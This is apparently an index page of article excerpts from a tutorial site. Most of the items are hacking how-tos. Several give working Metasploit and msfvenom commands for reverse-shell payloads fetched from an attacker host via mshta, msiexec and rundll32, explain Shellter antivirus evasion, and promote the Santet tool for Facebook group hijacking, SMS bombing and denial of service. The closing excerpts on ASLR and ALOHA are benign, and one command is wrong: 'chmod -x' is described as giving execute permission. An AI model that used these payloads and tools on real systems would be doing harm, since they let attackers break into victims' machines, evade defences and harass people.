Found 1625 Articles for Computer Network

theZoo's allows the study of malware and enable people who are interested in malware analysis to have access to live malware, analyse the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment.git clone https://github.com/ytisf/theZoocd theZoopip install --user -r requirements.txtpython theZoo.pyI recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with ... Read More

The Windows OS utility responsible for running HTA( HTML Application) files that we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.Malicious HTA fileOpen metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;use exploit/windows/misc/hta_serverset srvhost 192.168.1.109set lhost 192.168.1.109exploitNow run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.Read More

This article articulates how to hack using Santet tool which has several different attacks built into one package. It allows you to create payload, Hijack Facebook Group, perform SMS bomber and SMS Spoof attack and finally Denial of Service attack. Follow the instruction below to learn how to install Santet and use it further.Turn on your Kali machine, open a terminal and type ingit clonehttps://github.com/Gameye98/santet-onlineNow change your current directory to santet using the cd command − cd santet-onlineNow give execute permission to the santet.py file by executing this command − chmod -x santet.py, now run python santet.py as following;If everything ... Read More

Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.Launch msiexec attack via msfvenomLet’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows;msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msiAt the target end, when the victim execute the 1.msi file on the remote machine with the following utiliy;msiexec /q /i http://192.168.1.109/1.msiThe attacker get the reverse shell of the victim machine by starting multi/handler as the listener.use exploit/multi/handlerset pyaload windows/meterpreter/reverse_tcpset lhost 192.168.1.109exploitRead More

Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.InstallationYou can install Shellter directly on Kali by using the following command −apt-get install shellterapt-get install wine32How to BypassOpen shelter using wine app, select the operation mode as 'a'.choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder ... Read More

Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.Launch Rundll32 Attack via SMBMetasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.Generate DLL payloaduse exploit/windows/smb/smb_deliverymsf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)msf exploit(windows/smb/smb_delivery) > exploitNow, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.rundll32.exe \192.168.1.109\vabFG\test.dll, 0Read More

Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them. This article presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash ... Read More

ALOHA is a medium access control (MAC) protocol for transmission of data via ashared network channel. Using this protocol, several data streams originating from multiple nodes are transferred through a multi-point transmission channel. There are two types of ALOHA protocols – Pure ALOHA and Slotted ALOHA.Slotted ALOHA was introduced in 1972 by Robert as an improvement over pure ALOHA. Here, time is divided into discrete intervals called slots, corresponding to a frame.Working PrincipleThe communicating stations agree upon the slot boundaries. Any station can send only one frame at each slot. Also, the stations cannot transmit at any time whenever a ... Read More

ALOHA is a medium access control (MAC) protocol for transmission of data via a shared network channel. Using this protocol, several data streams originating from multiple nodes are transferred through a multi-point transmission channel. There are two types of ALOHA protocols – Pure ALOHA and Slotted ALOHA.In pure ALOHA, the time of transmission is continuous. Whenever a station has an available frame, it sends the frame. If there is collision and the frame is destroyed, the sender waits for a random amount of time before retransmitting it.Working PrincipleAfter transmitting a frame, a station waits for a finite period of time ... Read More

ALOHA is a multiple access protocol for transmission of data via a shared network channel. It operates in the medium access control sublayer (MAC sublayer) of the open systems interconnection (OSI) model. Using this protocol, several data streams originating from multiple nodes are transferred through a multi-point transmission channel.In ALOHA, each node or station transmits a frame without trying to detect whether the transmission channel is idle or busy. If the channel is idle, then the frames will be successfully transmitted. If two frames attempt to occupy the channel simultaneously, collision of frames will occur and the frames will be ... Read More